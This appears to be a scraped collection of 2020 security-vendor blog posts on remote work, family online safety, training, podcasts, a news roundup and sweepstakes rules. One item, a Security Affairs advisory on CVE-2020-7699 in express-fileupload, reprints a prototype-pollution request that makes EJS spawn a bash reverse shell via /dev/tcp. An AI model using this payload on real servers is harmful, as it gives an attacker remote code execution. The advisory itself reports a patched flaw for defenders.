From a people perspective, not everyone has been fortunate enough to have optimal home environments to work from during the lockdown, and few companies will have had a chance to truly consider all of the mental and physical health implications of their dispersed and sometimes isolated workers. On a wider societal note, it further accentuates the digital divide often talked about between the digital ‘haves’ and ‘have nots’ and those whose work simply has to carry on in the physical world despite the health risks it currently entails.


Gabriel Gumbs | Chief Innovation Officer at Spirion

@GabrielGumbs | (LinkedIn)

We decided early on that having a well-defined collaboration and communication strategy was key for the transition to remote work. That also meant ensuring we had a process for communicating early and often with our people. Our employees and managers made a more conscious effort to clarify roles and expectations as well as discuss progress with remote employees. Additionally, allowing employees to use equipment that they had access to in the office allowed for a smoother transition.

Efforts to centralize all pertinent company knowledge in one accessible library is also key to work-from-home success. Spirion’s CEO has done an excellent job taking the time to update employees on what actions the company is taking on a regular basis. And then, there are the fun social activities to bring everyone together online and keep morale up, such as after-hours trivia and virtual hangouts.


Andy Rose | Chief Security Officer at Vocalink

@AndyRoseCISO | (LinkedIn)

The need for 24/7 support of services had already driven the enablement of remote working at Vocalink, which is a part of the critical national infrastructure of the United Kingdom. The crisis therefore did not represent a large technical challenge. Staff fell into new working practices quite easily, and productivity remained consistent. Our parent company, Mastercard, had invested in increased VPN capacity and bandwidth as the crisis developed, so connectivity was available and stable.

Like many firms, our expectations of collaboration had been too focused on ‘in the office, in the room,’ and this new remote working model undermined that somewhat. The traditional voice conferencing facilities and instant messaging only partially met the requirements, so we had to rush to adapt and develop our online collaboration capabilities, introducing improved video conferencing capabilities and virtual white-boarding.

The reality is that we will never go back to the way we worked before. This digital transformation has been forced on all industries, and it’s highlighted how different work patterns can be equally effective. Time spent commuting long distances, for instance, could be better used by the firm to further improve productivity.


Ian Thornton-Trump | Chief Information Security Officer at Cyjax Limited

@phat_hobbit | (LinkedIn)

Try to be at peace with yourself and balance realism, optimism, and the achievable in your thinking. Above all, be patient with yourself and others. Take some time – a break in the middle of the day – to distract from the chaos that is permeating nearly every aspect of our days and nights.

I’m into exercising and gardening, and I just finished a book on the Templar Knights in the UK. (I’m planning an epic trip to visit as many of these ancient Templar sites as possible.) Stay in touch with your close friends and family, and be compassionate about folks in rougher circumstances than your own.

Ultimately, treat these extraordinary times as an opportunity to reflect on your life choices and career. As I look back on 25+ years in the industry, I know what I need to do next. I need to turn my knowledge into wisdom and create as many opportunities for the next generation of IT professionals as I can.


Michael Ball | Virtual Chief Information Security Officer at TeamCISO 

@Unix_Guru | (LinkedIn)

After COVID-19 hit, it took us a little bit of time to adjust to having our workforce not in the office and being able to work from home. This abrupt change in work policy meant configuring our VPN and adding licensing for a significant portion of our workforce that had never required VPN access in the past.

We quickly scrambled to get the VPN clients configured and pushed out to allow the employees to take their devices home with them. There were issues immediately in training end users to use the VPN client from home as well as an issue with excessive permissions allowed on the VPN groups from the beginning. (Convenience and speed trumps security yet again!)

Another issue that we found and hadn’t anticipated was that many of the employees were able to conduct their daily work without ever connecting their VPN back to the company. Things like Office 365, Salesforce and other SaaS applications allowed them to conduct their daily business (email, etc.) without connectivity to our office. That unfortunately put us in a position where we lost visibility to those devices. We had not considered forcing the VPN connectivity so that we could ensure that updates and endpoint protection were updated and appropriate, and that device monitoring wasn’t completely missing.

We had to send out an email and request that each individual send their device back into the office. We then scrambled to develop a procedure by which to accept the devices, refresh them, and send them back safely to allow us to reconfigure and force VPN connectivity at least periodically.


Shelly Blackburn | Vice President, Global Cyber Security Systems Engineering at Cisco

@shellyblackburn | (LinkedIn)

Cisco is a bit unique. Due to years of driving remote work internally, Cisco strategy is not solely driven from a small, homogenous, geographically centralized team. We have a truly global team and hire from a diverse candidate pool.

Strategic Take-Away #1: Get your leadership excited about the value to your organization. Remote work environments enable innovation, opportunity, and drive growth.

In response to the pandemic, we moved customers from 100% face-to-face work to remote work very quickly. Some moves were done in a matter of days, and this worked surprisingly well. Due to the shift to social online tools in our personal lives, colleges, government entities, and businesses adjusted to video calls and collaborative online tools fairly seamlessly.

Strategic Take-Away #2: Don’t be afraid to make the move to remote work quickly. With the right tools and a secure remote environment, the company and worker satisfaction with remote work can be extremely high.


Thom Langford | Founder of (TL)2 Security Ltd. 

@ThomLangford | (LinkedIn)

What’s worked well for me remote working during lockdown? Well, actually, I’ve always been sort of a remote worker, even back during my full employment days. I was able to work wherever and whenever I wanted to mainly because the services that supported me (IT services) were based in the cloud and not fixed at one location.

I’ve carried on that model in my own business. So, it doesn’t matter where I am, although right now it’s obviously one single place. I can use whatever I need wherever I need it. That includes Office 365, Adobe, and even my pension and payroll services. They’re all managed through the cloud.

The one thing I wish I had done better actually was to prepare more for videoconferencing when it comes to face-to-face meetings. I’m someone who likes to travel to meet people, to have business lunches, and even better, business dinners with somebody, because that’s how I like to connect… That’s how we get to know and build a relationship with each other.

Now, of course, is very different. We have to use videoconferencing. It’s easy for me in a sense because the Office 365 package provides all of that for me. But I find it difficult to create an initial rapport. So, for me, the biggest change and the biggest thing that I wish I had done sooner was that cultural change, that one of actually being able to adopt to video conferencing quicker. I’m used to it now, and I’ve always liked video conferencing when there was no alternative, but it feels very forced, or at least it did when all of this first kicked off.

I’m spending the time, as much as I can, learning and picking up on things whilst I’m in lockdown. I’m trying not to waste any of the time whatsoever on superfluous activities.


Brad Arkin | SVP, Chief Security & Trust Officer at Cisco

@BradArkin | (LinkedIn)

Business has transformed virtually overnight to a greater emphasis on working remotely and collaborating virtually. We at Cisco are in a fortunate position to work effectively and securely in a remote environment, and have seamlessly transitioned 95 percent of our global workforce to work from home. Additionally, as the largest security company in the world, Cisco has protected millions of users since the roll-out of our free security offerings to support customers as they transitioned workforces to remote work.

This situation is a reminder that we need to be planful, agile, and constantly reinvent ourselves to keep pace with the needs of today and the future, as well as to anticipate the unexpected and unknown. The speed by which this situation arose and altered our approach to work, most likely forever, shows how important it is to be able to see around corners, to plan, prepare, and adjust for whatever may come.


We’ve all been forced to adapt these past months. Some of us found ourselves working from home for the first time. You can hear more about security leaders’ remote working experiences and advice in the clip below:



For additional perspectives on how employees can make the most of remote work, download Cisco’s eBook:
Adjusting to Extraordinary Times: Tips from Cybersecurity Leaders Around the World


The post Experiences from Cybersecurity Leaders in Extraordinary Times: Adjustments and Outcomes appeared first on Cisco Blogs.

Flaw in popular NodeJS ‘express-fileupload’ module allows DoS attacks and code injection

Expert found a flaw in a popular NodeJS module that can allow attackers to perform a denial-of-service (DoS) attack on a server or get arbitrary code execution.

The NodeJS module “express-fileupload,” which has more that 7.3 million times downloads from the npm repository.

The NodeJS module is affected by a ‘Prototype Pollution’ CVE-2020-7699 vulnerability that can allow attackers to perform a denial-of-service (DoS) attack on a server or inject arbitrary code.

“This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.” reads the NIST’s description.

Unfortunately, the actual number of installs could be greater because developers could download the module from alternative repositories, including GitHub and mirror websites.

Prototypes are used to define a JavaScript object’s default structure and default values, they are essential to specify an expected structure when no values are set.

An attacker that is able to modify a JavaScript object prototype can make an application crash and change behavior if it doesn’t receive the expected values.

Due to the diffusion of JavaScript, the exploitation of prototype pollution flaws could have serious consequences on web applications.

Prototyping attacks consist of injecting incompatible types of objects into existing ones to trigger errors that could lead to Denial of Service (DoS) condition or arbitrary code execution, including the establishment of a remote shell.

According to the security researcher Posix who discovered the vulnerability, the issue leverages the “parseNested” feature implemented by the express-fileupload.

The express-fileupload module implements several options for uploading and managing files in the nodejs application. One of the options is the parseNested which makes argument flatten into nested objects.

“Therefore, if we provide {"a.b.c": true} as an input,
Internally, It will used as {"a": {"b": {"c": true}}}reads the post published by Posix.

Below the code for the the ‘parseNested’ option:

const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();

app.use(fileUpload({ parseNested: true }));

app.get('/', (req, res) => {
res.end('express-fileupload poc');


Upon providing a payload in the “Content-Disposition” HTTP header, an attacker can provide a “__proto__.toString” value to trigger the attack.

“Therefore, configure and run the express server using express-fileupload in the above form.” continues the post.

Content-Type: multipart/form-data; boundary=——–1566035451
Content-Length: 123

Content-Disposition: form-data; name=”name”; filename=”filename”


The “__proto__” mutator can be used to modify JavaScript’s “Prototype” property as inherited by all JS objects and structures.

This means that the above HTTP request will override and corrupt the build-in “toString” method of every object present in users’ code.

“If Object.prototype.toString can be polluted, this will cause an error, and for every request, express [sic] always returns 500 error,” continues the researcher.

The researcher also explained that an attacker could exploit the same flaw to get a shell on the vulnerable system. For this variant of the attack, it is necessary that the vulnerable “express-fileupload” version used by the application was also using the templating engine EJS (Embedded JavaScript templates).

“The simplest way to obtain shell through prototype solution in the express application is by using the ejs. Yes, There is a limitation to whether the application should be using the ejs template engine” continues the expert.

An attacker can trigger the issue by sending an HTTP request that overwrites the “outputFunctionName” option of EJS.

The payload below exploits prototype pollution within express-fileupload, and instructs EJS (should it be in use) to execute a NodeJS “child_process.” This process can be used to get a reverse shell to the attacker’s computer.

Content-Type: multipart/form-data; boundary=--------1566035451
Content-Length: 221

Content-Disposition: form-data; name="__proto__.outputFunctionName";

x;process.mainModule.require('child_process').exec('bash -c "bash -i &> /dev/tcp/ 0>&1"');x

The good news is that immediately after receiving the researcher’s report, the “express-fileupload” fixed the vulnerability. Users are recommended to get the latest 1.1.9 version from the npm repository.

Pierluigi Paganini

(SecurityAffairs – hacking, D-Link)

The post Flaw in popular NodeJS ‘express-fileupload’ module allows DoS attacks and code injection appeared first on Security Affairs.

What Security Means to Families

digital parenting

What Security Means to Families

One truth of parenting is this: we do a lot of learning on the job. And that often goes double when it comes to parenting and the internet.

That’s understandable. Whereas we can often look to our own families and how we were raised for parenting guidance, today’s always-on mobile internet, with tablets and smartphones almost always within arm’s reach, wasn’t part of our experience growing up. This is plenty new for nearly all of us. We’re learning on the job as it were, which is one of the many reasons why we reached out to parents around the globe to find out what their concerns and challenges are—particularly around family safety and security in this new mobile world of ours.

 Just as we want to know our children are safe as they walk to school or play with friends, we want them to be just as safe when they’re online. Particularly when we’re not around and there to look over their shoulder. The same goes for the internet. Yet where we likely have good answers for keeping our kids safe around the house and the neighborhood, answers about internet safety are sometimes harder to come by.

Recently, we conducted a survey of 600 families and professionals in the U.S. to better understand what matters to them—in terms of security and the lives they want to lead online. The following article reflects what they shared with us, and allows us to share it with you in turn, with the aim of helping you and your family stay safer and more secure. 1

What concerns and questions do parents have about the internet?

The short answer is that parents are looking for guidance and support. They’re focused on the safety of their children, and they want advice on how to parent when it comes to online privacy, safety, and screen time. Within that, they brought up several specific concerns:

Help my kids not feel anxious about growing up in an online world.

There’s plenty wrapped up in this statement. For one, it refers to the potential anxiety that revolves around social networks and the pressures that can come with using social media—how to act, what’s okay to post and what’s not, friending, following, unfriending, unfollowing, and so on—not to mention the notion of FOMO, or “fear of missing out,” and anxiety that arises from feelings of not being included in someone else’s fun.

Keep my kids safe from bullying, or bullying others.

Parents are right to be concerned. Cyberbullying happens. In a study spanning 30 countries, one child in three has said they’ve been the victim of cyberbullying according to a study conducted by UNICEF. On the flip side of that, a 2016 study of more than 5,000 students in the U.S. by the Cyberbullying Research Center reported that 11.5% of students between 12 and 17 indicated that they had engaged in cyberbullying in their lifetime.

Feel like I can leave my child alone with a device without encountering inappropriate content.

If we think of the internet as a city, it’s the biggest one there is. For all its libraries, playgrounds, movie theatres, and shopping centers, there are dark alleys and derelict lots as well. Not to mention places that are simply age appropriate for some and not for others. Just as we give our children freer rein to explore their world on their own as they get older, the same holds true for the internet. There are some things we don’t want them to see and do.

Balance the amount of screen time my children get each day.

Screen time is a mix of many things—from schoolwork and videos to games and social media. It has its benefits and its drawbacks, depending on what children are doing and how often they’re doing it. The issue often comes down to what is “too much” screen time, particularly as it relates to the bigger picture of physical activity, face-to-face time with the family, hanging out with friends, and getting a proper bedtime without the dim light of a screen throwing off their sleep rhythms.

Where can parents get started?

Beyond our job of providing online security for devices, our focus at McAfee is on protecting people. Ultimately, that’s the job we aim to do—to help you and your family be safer. Beyond creating software for staying safe, we also put together blogs and resources that help people get sharp on the security topics that matter to them. For parents, check out this page which puts forward some good guidance and advice that can help. Check it out, and we hope that you’ll find even more ways you can keep you and your family safe.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.



  • Survey conducted in October 2019, consisting of 600 computer-owning adults in the U.S.


The post What Security Means to Families appeared first on McAfee Blogs.

Cisco Networking Academy is Helping Close the Cybersecurity Skills Gap

Authored by Swati Handa, Global Cybersecurity Strategy Manager, Cisco

This week in #EducationNow, join one of our cybersecurity experts to learn how Cisco Networking Academy is answering the call to cybersecurity education in a rapidly evolving threat landscape.

To say we live in vastly different times than we did six months ago is an understatement. COVID-19 has brought a rapid, seismic shift in how we work, play, and live. Now, more than ever, people are dependent on the internet for nearly every aspect of their lives – work, education, entertainment, healthcare, and more. But this comes with a tremendous risk – increased cyberattacks.

A recent global survey reveals that 91 percent of businesses reported an increase in cyberattacks with employees working from home during the pandemic – with the financial, healthcare, and government sectors being some of the hardest hit (Entrepreneur, 2020). Cyber criminals are capitalizing on health and economic fears surrounding the epidemic, attracting victims with false promises of cures, up-to-date infection statistics, stimulus checks, and more through phish kits, fraud kits, and malware delivery systems. Even before the crisis, CEOs ranked cybersecurity their number one concern (EY, 2019 CEO Imperative Study), and worldwide spending on IT security was forecast to reach $151 billion by 2023 (IDC, Worldwide Security Forecast, 2019–2023). Now things have changed. According to McKinsey & Company, many industries, including healthcare, financial services, technology, and the public sector, are projected to increase their cybersecurity spend to combat the rise in attacks.

Closing the cybersecurity skills gap

Cybersecurity can’t be left solely to technology. It needs human input, too. We need more cybersecurity professionals to help prevent and combat these attacks, but there is a dire shortage globally of 4.07 million cybersecurity professionals, according to the 2019 (ISC)2 Cybersecurity Workforce Study. (ISC)² also reports that the global cybersecurity workforce needs to grow by 145 percent to close the skills gap and better defend organizations worldwide. The answer to the skills gap? Education. Cisco Networking Academy is well-positioned to create the needed cybersecurity professionals to fill that gap – and to provide people with the basic knowledge they need to protect themselves and the organizations they work for.

                                        Certified cybersecurity professionals on average are paid $71K/year while those without certification earn $55K/year                                                         – ((ISC)² Cybersecurity Workforce Study, 2019)

Cisco Networking Academy is answering the call

For over 23 years, Cisco Networking Academy program has been partnering with leading educational institutions around the world to prepare more than 11 million students in 180 countries – from all backgrounds and experiences – for IT careers in our ever-changing digital economy. Last year, 2.1 million students from around the world participated in the program, with 42 percent of students from the Americas, 23 percent from Asia Pacific, Japan, and China (APJC), and 35 percent from Europe, Middle East, Africa, and Russia (EMEAR). Twenty eight percent of those students were female.

Networking Academy’s best-in-class curriculum offers a wide variety of learning portfolios, including basic courses to help the general public learn about everyday vulnerabilities that can affect their daily business and personal lives. For those who wish to explore cybersecurity, or for those who want to begin the steps towards a cybersecurity career, there are foundational and professional level courses that range from recognizing the challenges of the expanding digital economy, to evaluating security vulnerabilities, to ethics and laws. Completion of the “Intro to Cybersecurity” and “Cybersecurity Essentials” courses prepares students for one of three pathways: a CyberOps Associate certification, or higher-level courses in either IoT Security or Cisco Certified Network Associate (CCNA) Security.

The latest cybersecurity course offering is the CyberOps Associate course, which is aligned to the recently launched Cisco Certified CyberOps Associate certification This new course focuses on cybersecurity operations and provides students with the knowledge and skills needed to monitor, detect, analyze, and respond to cybersecurity threats. It also features enhancements to improve learning effectiveness, including gaming, videos, and more than 30 hours of hands-on labs, featuring virtual machines and Packet Tracer (virtual network simulator) activities.


Average cybersecurity/IT security annual salaries globally from the Global Knowledge 2019 IT Skills and Salary Report
Average cybersecurity/IT security annual salaries globally from the Global Knowledge 2019 IT Skills and Salary Report 

Expanding our impact through partnerships and career resources

The threat landscape may be rapidly evolving, but Cisco Networking Academy is fighting back. While constantly adapting its best-in-class curriculum to meet the rigorous demands of the industry, Networking Academy continues to fund

new collaborations to fulfill its mission of empowering all people with career possibilities. By working with government agencies, like ministries of education, and universities and community colleges, Networking Academy now has over 12,000 academies and 26,500 instructors around the world, offering its curriculum to millions of students – both new and those changing careers. It also offers an unparalleled learning experience, incorporating state-of-the-art learning tools, like Packet Tracer, a virtual networking simulator, and learn-a-thons. And students who complete a course earn digital badges that certify their skills: a growing requirement by employers. Additionally, students have a robust set of career resources available to them, including a job matching engine, alumni LinkedIn network, career advice, and more, through the Cisco Networking Academy Talent Bridge.’


Learn more about Cisco Networking Academy and explore its cybersecurity courses and pathways.

How are you educating the next generation for the future of cybersecurity? Join us next week in #EducationNow to discuss how algorithms are impacting the way we educate and learn.

Cisco Public Sector Thought Leadership

The post Cisco Networking Academy is Helping Close the Cybersecurity Skills Gap appeared first on Cisco Blogs.

“Don’t fire the CISO”, with Quentyn Taylor

For the latest episode of the Security Stories Podcast, I met someone who actually has the title ‘CISO Supremo’. It’s an award which recognizes the individuals and teams working hard to protect the United Kingdom from cybercrime.

Security Stories: Quentyn Taylor

Quentyn Taylor Security Storie

As well as being CISO Supremo, Quentyn Taylor is also the CISO for Canon Europe. Odds are that you might have had your hands on a Canon camera or a printer at one point in your life. If you’ve ever had a security related query about one of their products in Europe, it’s Quentyn’s team whom you would have spoken to.

That’s because they are a customer centric security team (as well as also protecting the internal aspects of the business). Hearing the story behind this was incredibly interesting.

It’s clear from the get go how passionate Quentyn is about the cybersecurity industry.  During the podcast we talk about having a degree vs. relevant experience , and how to overcome the “virtual hurdle” of working remotely. Like many of us, Quentyn is really missing those in person interactions with his team members. We also talk about data breaches, and why firing the CISO shouldn’t be the first resort.

We then end the interview as all interviews should: with a spot of cybersecurity cocktail making.

“T-shaped” people

One of the biggest things I took away from our chat, is the concept of “T-shaped” people. I hadn’t heard the term before, but apparently it’s fairly common in the recruitment and agile software world.

For anyone who doesn’t know, “T-shaped” people is a way of describing someone who is an expert in one particular field, but you also spend time acquiring different skills.  For example, a cybersecurity engineer who spends some time on the IT help desk, or even in the PR team, as some of Quentyn’s team do.

I really like that, because it means that it doesn’t matter what age you are, or what field you’re in. You can learn another skill, see the other side of the coin, and bring that knowledge back to your area of expertise.

It occurred to me that if more people did that i.e explore other departments in a business other than their own, we might see more harmonious communications between different teams.

And that applies to security as well. As Quentyn was saying, those of us in the cybersecurity industry often think that security is the most important thing in any business. Because we have a natural bias, and, well, we’ve seen things…

However, business decisions are made for various reasons at the time, and sometimes security is not the foundational factor behind those. Or, there’s a level of security risk that people are prepared to holster.

In those scenarios, the role of the cybersecurity team is to find a way to cushion the risk. Even if the simplest, or the fastest, solution isn’t a solution any more. We’ll find another way to support you.

On this Day: Mirai botnet

Security Stories on this day

Also in episode 10, we take the DeLorean for a short spin back to 2016. “On this Day” is a regular Security Stories feature, where we visit a significant cybersecurity event from the past, and this time, we explored the story behind the Mirai botnet.

After it first surfaced in August, Mirai came into the media’s attention a few weeks later when researcher Brian Krebs was targeted by a large DDoS attack.

In his debrief with Akamai (the CSO of which, Andy Ellis, we spoke to in the last episode), it was noted that rather than relying on DNS amplification to achieve such traffic, it seemed to have come from many different sources.

This suggested that an enormous number of devices were compromised, and soon enough the world started to hear and read the word “Mirai”.

You can listen to this podcast on Apple Podcasts, Spotify, Google Podcasts, or wherever you normally get your podcasts from! You can also listen right here and now:

Are you a security leader who would like to share their story on the podcast?
Please get in touch with me on LinkedIn and we’ll take it from there.

Security Stories podcast

On the Security Stories Podcast, we meet pioneers from across the world of cybersecurity, who then share their experiences with us.

The post “Don’t fire the CISO”, with Quentyn Taylor appeared first on Cisco Blogs.

This Week in Security News: Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 and Vermont Taxpayers Warned of Data Leak Over the Past Three Years

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about how Trend Micro found an IoT Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion. Also, learn about how the Vermont Department of Taxes may have been exposing taxpayer data for more than three years.

Read on:

Ransomware is Still a Blight on Business

Ransomware has been with us for years, but only really became mainstream after the global WannaCry and NotPetya incidents of 2017. Now mainly targeting organizations in lieu of consumers, and with increasingly sophisticated tools and tactics, the cybercriminals behind these campaigns have been turning up the heat during the COVID-19 pandemic. That’s why we need industry partnerships like No More Ransom.

Garmin Outage Caused by Confirmed WastedLocker Ransomware Attack

Wearable device maker Garmin shut down some of its connected services and call centers last week following what the company called a worldwide outage, now confirmed to be caused by a WastedLocker ransomware attack. Garmin’s product line includes GPS navigation and wearable technology for the automotive, marine, aviation, marine, fitness, and outdoor markets.

Trend Micro Launches Cloud Solution for Microsoft Azure

Trend Micro announced the availability of its Trend Micro Cloud One – Conformity offering to Azure customers, helping global organizations tackle misconfigurations, compliance challenges and cyber-risks in the cloud. The company also achieved the CIS Microsoft Azure Foundation Security Benchmark, certifying that the Conformity product has built-in rules to check for more than 100 best practices in the CIS framework.

Ensiko: A Webshell with Ransomware Capabilities

Ensiko is a PHP web shell with ransomware capabilities that targets platforms such as Linux, Windows, macOS, or any other platform that has PHP installed. The malware has the capability to remotely control the system and accept commands to perform malicious activities on the infected machine. It can also execute shell commands on an infected system and send the results back to the attacker via a PHP reverse shell.

‘Boothole’ Threatens Billions of Linux, Windows Devices

A newly discovered serious vulnerability – dubbed “BootHole” – with a CVSS rating of 8.2 could unleash attacks that could gain total control of billions of Linux and Windows devices. Security firm Eclypsium researchers released details this week about how the flaw can take over nearly any device’s boot process.

Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902

Following the initial disclosure of two F5 BIG-IP vulnerabilities in early July, Trend Micro continued monitoring and analyzing the vulnerabilities and other related activities to further understand their severities. Based on the workaround published for CVE-2020-5902, Trend Micro found an IoT Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion and deliver the malicious payload.

Hackers Stole GitHub and GitLab OAuth Tokens from Git Analytics Firm Waydev

Waydev, a San Francisco-based company, runs a platform that can be used to track software engineers’ work output by analyzing Git-based codebases. Earlier this month, the company disclosed a security breach, saying that hackers broke into its platform and stole GitHub and GitLab OAuth tokens from its internal database.

Application Security 101

As the world currently grapples with the disruption brought about by the coronavirus pandemic, the need for digital transformation has become not only more apparent but also more urgent.  Applications now play an integral role, with many businesses and users relying on a wide range of applications for work, education, entertainment, retail, and other uses.

Vermont Taxpayers Warned of Data Leak Over the Past Three Years

The Vermont Department of Taxes may have been exposing taxpayer data that could be used in credential scams for more than three years due to a vulnerability in its online tax filing system. A notice posted on the department’s website warned taxpayers who filed a Property Transfer Tax return through the department’s online filing site between Feb. 1, 2017, and July 2, 2020, may have had their personal information leaked.

Guidelines Related to Security in Smart Factories Part 6: MITRE ATT&CK

This blog series explains examples of general-purpose guidelines for ICS and OT security and helps readers understand the concepts required for security in smart factories. Thus far, part one through part five have explained IEC62443, the NIST CSF, part of the P800 series, and CIS Controls. In part six, Trend Micro explains MITRE ATT&CK, although not a guideline, it is a knowledge base in which offensive and defensive technologies in cyber-attacks are clearly organized.

If You Own One of These 45 Netgear Devices, Replace It: Firm Won’t Patch Vulnerable Gear Despite Live Proof-of-Concept Code

Netgear has decided not to patch more than 40 home routers to plug a remote code execution vulnerability – despite security researchers having published proof-of-concept exploit code. The vulnerability was revealed publicly in June by Trend Micro’s Zero Day Initiative (ZDI).

Online Dating Websites Lure Japanese Customers to Scams

In May, Trend Micro observed a sudden increase in traffic for online dating websites primarily targeting Japanese customers. After analyzing and tracking these numbers, we found that these dating scam campaigns attract potential victims by using different website domains that have similar screen page layouts. By the end of the transactions, the fraudsters steal money from victims without the subscribers receiving any of the advertised results.

ESG Findings on Trend Micro Cloud-Powered XDR Drives Monumental Business Value

Trend Micro’s cloud-powered XDR and Managed XDR offerings optimize threat detection and response across all critical vectors. In a recent survey commissioned by Trend Micro and conducted by ESG, organizations surveyed experience faster detection and less alert fatigue as a result of intelligently using data from all their security controls (including those covering endpoints, email, servers, cloud workloads and networks).

How does your organization manage threat detection and response? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 and Vermont Taxpayers Warned of Data Leak Over the Past Three Years appeared first on .

Security is a Feeling- With the McAfee #SecureMyLife RT2Win Sweepstakes!

Security is a Feeling-  Share it with the McAfee #SecureMyLife RT2Win Sweepstakes!

The word ‘security’ means something unique to everyone. Security is a feeling, an emotion, a sense of belonging and place: It could be the feeling of cuddling as a family in a pillow fort, making sure your house is locked at night, or always having a smartphone in your pocket for directions or an emergency.

Though our digital devices are convenient, they can also be cause for possible security concerns due to overlooked weaknesses. Check out the latest research from the McAfee team for more information.

While all this dazzling technology has its appeal, we here at McAfee understand the importance of creating new security solutions for those who want to live their connected lives with confidence.

In fact, to celebrate the latest innovations, we’re giving two [2] lucky people the chance to win an Amazon gift card. Not a customer? Not a problem!  Simply retweet one of our contest tweets with the required hashtag between August 3rd, 2020 – August 16th 2020 for your chance to win. Follow the instructions below to enter, and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, go to, and find the #RT2Win sweepstakes tweet.
  • There will be four [4] sweepstakes tweets will be released at the following schedule including the hashtags: #RT2Win #Sweepstakes AND #SecureMyLife
    • Monday, August 3, 2020 at 9:05AM PST
    • Thursday, August 6, 2020 at 9:05AM PST
    • Monday, August 10, 2020 at 9:05AM PST
    • Thursday, August 13, 2020 at 9:05AM PST
  • Retweet the sweepstakes tweet released on the above date before 11:59PM PST, from your own handle. The #RT2Win, #Sweepstakes AND #SecureMyLife hashtags must be included to be entered.
  • Sweepstakes will end on Monday August16, 2020  at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified on Wednesday August 19, 2020 via Twitter direct message.
  • Limit one entry per person.

     1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include ““#RT2Win, #Sweepstakes, and #SecureMyLife” for a chance at an Amazon Gift card. Two [2] winners will be selected by  10:00 AM PT August 19, 2020, for a total of two [2] winners. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

McAfee #SecureMyLife    RT2Win   Sweepstakes Terms and Conditions

     2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee’s #RT2Win  Sweepstakes will be conducted from August 3rd through August 16th. All entries for each day of the #SecureMyLife  RT2Win Sweepstakes must be received during the time allotted for the #RT2Win   Sweepstakes. Pacific Daylight Time shall control the McAfee RT2Win Sweepstakes. The #SecureMyLife RT2Win Sweepstakes duration is as follows:

#RT2Win   Sweepstakes:

  • Begins: Monday, August 3rd, 2020 at 7:00am PST
  • Ends: Sunday, August 16, 2020 at 11:59 PST
    • Opportunity 1: Monday, August 3, 2020 at 9:05AM PST
    • Opportunity 2: Thursday, August 6, 2020 at 9:05AM PST
    • Opportunity 3: Monday, August 10, 2020 at 9:05AM PST
    • Opportunity 4: Thursday, August 13, 2020 at 9:05AM PST
  • Winners will be announced: by 10:00AM PST August 19, 2020

For the #SecureMyLife RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the #SecureMyLifeSecureMyLife RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #SecureMyLife, #RT2Win and #Sweepstakes.
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #McAfee, #SecureMyLife, #RT2Win and #Sweepstakes hashtags.
    1. Note: Tweets that do not contain the #SecureMyLife, #RT2Win and #Sweepstakes hashtags will not be considered for entry.
  3. Limit one entry per person. 

Two (2) winners will be chosen for the #McAfee #SecureMyLife Sweepstakes tweet from the viable pool of entries that retweeted and included #. McAfee and the McAfee social team will select winners at random from among the viable entries. The winners will be announced and privately messaged on August 19, 2020 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. SWEEPSTAKES IS IN NO WAY SPONSORED, ENDORSED, ADMINISTERED BY, OR ASSOCIATED WITH TWITTER, INC. 

     3. Eligibility: 

McAfee’s #RT2Win   Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the #SecureMyLifeSecureMyLife RT2Win Sweepstakes begins and live in a jurisdiction where this prize and #SecureMyLifeSecureMyLife RT2Win  Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

     4. Winner Selection:

Winners will be selected from the eligible entries received during the days of the #SecureMyLifeSecureMyLife RT2Win   Sweepstakes periods. Sponsor will select the names of two [2] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official #SecureMyLifeSecureMyLife RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

     5.Winner Notification: 

Each winner will be notified via direct message (“DM”) on by August 19, 2020. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

     6. Prizes: 

